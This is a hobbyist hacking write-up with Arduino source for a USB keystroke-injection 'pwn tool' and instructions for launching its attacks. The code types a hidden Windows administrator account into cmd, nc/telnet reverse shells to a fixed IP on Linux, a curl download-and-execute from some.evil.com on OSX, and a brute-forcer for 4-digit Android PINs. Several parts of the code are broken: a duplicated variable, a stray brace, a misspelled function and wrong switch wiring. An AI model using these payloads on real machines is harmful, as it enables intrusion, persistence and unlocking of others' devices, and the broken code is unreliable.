Arduino Pwn Tool

   By: magikh0e 
   magikh0e _aT_ ihtb d0t org
                                                                                        
'\v/`  
     (o 0)  m0o. 
 (_)  /
 
 
  Last Edit: July 5 2015 (work in progress, more updates coming...)

Table Of Contents

Prerequsites
Getting Started
 -APT Source
 -Launching Attacks
TODO 

APT - Arduino Pwn Tool is a tool similar to a Teensy Kit, for the purpose of emulating a HID device / Keyboard. 
Using an Arduino as a HID device gives you the ability to quickly execute commands on the target system. Using a 5 pin DIP
switch, APT has the ability to launch attacks against different platforms, while being user selectable without re-programming
the device. There is most likely a better suited name, I just wanted to use APT for once ;D

Attacks are currently limited for now while I add more. Android, Linux, OSX & Windows supported for now.

Prerequesite's

Hardware: 
	Arduino UNO R2/R3 HID Device (Setup Arduino UNO as a HID Device)
Parts:
	5-Pin DIP Switch

(APT board layout diagram unavailable — original figure lost to bitrot)

Arduino to DIP Switch Wiring
Pin 1 on DIP Switch = Pin 3 on Arduino
Pin 2 on DIP Switch = Pin 4 on Arduino
Pin 3 on DIP Switch = Pin 5 on Arduino
Pin 4 on DIP Switch = Pin 6 on Arduino
Pin 5 on DIP Switch = Pin 7 on Arduino

Once you have the Arduino wired up, flash the following code.


APT Source Code
// Arduino Pwn Tool
// By: magikh0e


#define LED1 13
#define S1 7
#define S2 6 
#define S3 5
#define S4 4
#define S5 3

int s1state;
int s2state;
int s3state;
int s4state;
int s5state;
int s1run;
int s3run;
int s3run;
int finished = 0;
const int num1_start = 0;
const int num2_start = 0;
const int num3_start = 0;
const int num4_start = 0;
const int num1_stop = 9;
const int num2_stop = 9;
const int num3_stop = 9;
const int num4_stop = 9;

void setup() {
  pinMode(LED1, OUTPUT);
  pinMode(S1, INPUT);
  pinMode(S2, INPUT);
  pinMode(S3, INPUT);
  pinMode(S4, INPUT);
  pinMode(S5, INPUT);
  
  // setup serial port
  Serial.begin(9600);
  Serial.println("Arduino Pwn Tool - Ready for attacking...");
}

void loop() {
  s1state = digitalRead(S1);
  s2state = digitalRead(S2);
  s3state = digitalRead(S3);
  
  while (s1state == HIGH) {
  Serial.print("Executing Payload: AddUser for windows");
  windows_addUser();
  digitalWrite(S1, LOW);
  s1run = 1;
  }

  while (s2state == HIGH) {
  Serial.print("Executing Payload: ReverseShell for Linux");
  linux_ReverseShell();
  digitalWrite(S2, LOW);
  }
  
  if (s3state == HIGH) {
  Serial.print("Executing Payload: DownloadExec for OSX");
  osx_DownloadExec();
  digitalWrite(S3, LOW);
  }
  
  if (s4state == HIGH) {
  Serial.print("Executing Payload: BruteForcePIN for Android");
  BruteForceAndroidPIN();
  digitalWrite(S4, LOW);
  }
}

void windows_addUser() {
  Keyboard.press(KEY_LEFT_GUI);
      delay(1000);
      Keyboard.releaseAll();
      delay(1000);
      Keyboard.print("cmd.exe");
      delay(1000);
      Keyboard.press(KEY_LEFT_CTRL);
      Keyboard.press(KEY_LEFT_SHIFT);
      Keyboard.println("");
      Keyboard.releaseAll();
      delay(2000);
      Keyboard.press(KEY_TAB);
      Keyboard.release(KEY_TAB);
      Keyboard.press(KEY_TAB);
      Keyboard.release(KEY_TAB);
      Keyboard.press(KEY_TAB);
      Keyboard.release(KEY_TAB);
      Keyboard.println("");
      delay(1000);
      Keyboard.println("net user hax0r hax0r_password /add");
      delay(1000);
      Keyboard.println("net localgroup administrators hax0rr /add");
      delay(1000);
      Keyboard.println("exit");
}

void terminal() {
 
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.send_now();
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_T);
  Keyboard.send_now();
  
  delay(100);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now(); 

}

# define PAYLOAD1 "mknod bp1 p && nc 1.1.1.1 31337 0<bp1 | /bin/bash 1>bp1 &"
//# define PAYLOAD2 "/bin/bash -i > /dev/tcp/192.168.1.40/8080 0<&1 2>&1 &" 
#define PAYLOAD3 "mknod bp2 p && telnet 1.1.1.1 31337 0<bp2 | /bin/bash 1>bp2 &"

void linux_ReverseShell() {
   delay(5000);
  terminal();
  delay(3000);
  Keyboard.println(PAYLOAD1);
  delay(2000);
  //Keyboard.println(PAYLOAD2);
  //delay(2000);
  Keyboard.println(PAYLOAD3);
  delay(2000);
  Keyboard.println("exit");
}

void run(char *SomeCommand){
  
  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
  Keyboard.set_key1(KEY_SPACE);
  Keyboard.send_now();

  delay(500);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();

  Keyboard.print(SomeCommand);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();

  Keyboard.set_key1(0);
  Keyboard.send_now();
}

void osx_DownloadExec() {
}
  delay(5000);
  run("terminal");
  delay(3000);
  Keyboard.print("curl http://some.evil.com/shellcode.txt");
  delay(100);
  Keyboard.println(">/tmp/pay");
  delay(5000);
  Keyboard.print("xxd -r -p /tmp/pay");
  delay(100);
  Keyboard.println(" /tmp/p1");
  delay(100);
  Keyboard.println("chmod +x /tmp/p1");
  delay(100);
  Keyboard.println("/tmp/p1 &");
}

void BruteForcePIN() {
if ( finished == 0 )
  {
    for( int num1 = num1_start; num1 <= num1_stop; num1++ )
    {
      for( int num2 = num2_start; num2 <= num2_stop; num2++ )
      {
        for( int num3 = num3_start; num3 <= num3_stop; num3++ )
        {
          for( int num4 = num4_start; num4 <= num4_stop; num4++ )
          {
            if ( (num4 == 4) || (num4 == 9) ) // Wait for 30 seconds after 5 attempts - android lock
            {
              Keyboard.println(String(num1) + String(num2) + String(num3) + String(num4));
              for ( int timer = 1; timer <= 6; timer++ ) // 6 * 5 seconds = 30 sec
              {
                // Wait 5 seconds and hit Enter
                delay(5000);
                Keyboard.println();
              }
              delay(2000);
              }
            else 
            {
              Keyboard.print(String(num1) + String(num2) + String(num3) + String(num4)); 
              delay(500);
              Keyboard.println();
            }
          }
        }
      }
    }
      finished = 1;
  }
  else
  {          
    numalWrite(S4, LOW);    
    delay(2500);                  
    Keyboard.println();
  }
}




 

Launching Attacks
APT currently supports three different attacks: ReverseShell (Linux), addUser (Windows), DownloadExec (OSX) & BruteForcePIN()

ReverseShell();
This function uses netcat or standard utilities for creating a reverse shell connection from a Linux target. In order to use, the code
must be modified to reflect the appropriate IP address and Port.

addUser();
This function will add a new user to the local windows administrator group. Update the code to reflect the username and password you wish 
to use.

DownloadExec();
This function will download shellcode from a defined url and then execute it on the target OSX system.

BruteForcePIN();
This function will allow you to connect the Arduino to a Android Phone/Tablet via OTG cable and brute force 4 digit PINs / Passwords.



By default, no attacks are launched at boot time. 
NOTE: Before launching an attack, you must already be plugged into the target.

To launch ReverseShell(), flip DIP switch #2 for one second, then back off.
To launch addUser(), flip DIP switch #1 for one second, then back off.
To launch DownloadExec(), flip DIP switch #3 for one second, then back off.
To launch BruteForcePIN(), flip DIP switch #3 leave it on until you wish for 
the attack to stop.






TODO
- Add more realtime configurable options: Select OS payload and Attack.
- Update existing attacks to support all platforms.
- Add more Android Attacks
- Add LCD with Menu system for selecting attacks